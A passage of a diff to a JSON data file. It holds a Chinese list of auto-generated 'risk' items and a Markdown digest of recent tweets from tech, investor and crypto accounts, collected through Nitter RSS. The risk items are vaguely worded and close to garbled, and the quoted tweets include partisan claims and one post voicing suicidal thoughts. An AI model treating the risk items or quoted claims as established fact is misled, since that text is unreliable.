"协调层设计未规范化,不确定性协议可能引发执行力鸿沟" + }, + { + "id": "r2", + "level": "MID", + "title": "政治噪声模型共谋", + "detail": "虚假危机萌生策略恐加重公众认知分裂" + }, + { + "id": "r3", + "level": "OPP", + "title": "前端竞争生态显性化", + "detail": "工具链统一取舍窗口正在形成" + }, + { + "id": "r4", + "level": "HIGH", + "title": "女性生育决策算法干预", + "category": "生物伦理", + "detail": "年轻群体自动保守医疗消费预期被技术重塑" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T14:08:29.375190+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 33 | **成功获取**: 17 | **推文总数**: 145\n\n---\n\n### ✅ @sama — Sam Altman(10 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: URLError: \n\n### ✅ @ylecun — Yann LeCun(10 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(10 条)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(10 条)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n---\n\n### ✅ @paulg — Paul Graham(10 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(10 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(10 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(10 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(10 条)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(10 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764743205134644#m)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764741435179442#m)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: URLError: \n\n### ✅ @david__tian — David Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: URLError: \n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(10 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n**[2026-04-23T14:42:44+00:00]**\n> RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹\n[原文链接](https://nitter.net/cuckuke/status/2047325302771061148#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(0 条)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(10 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! 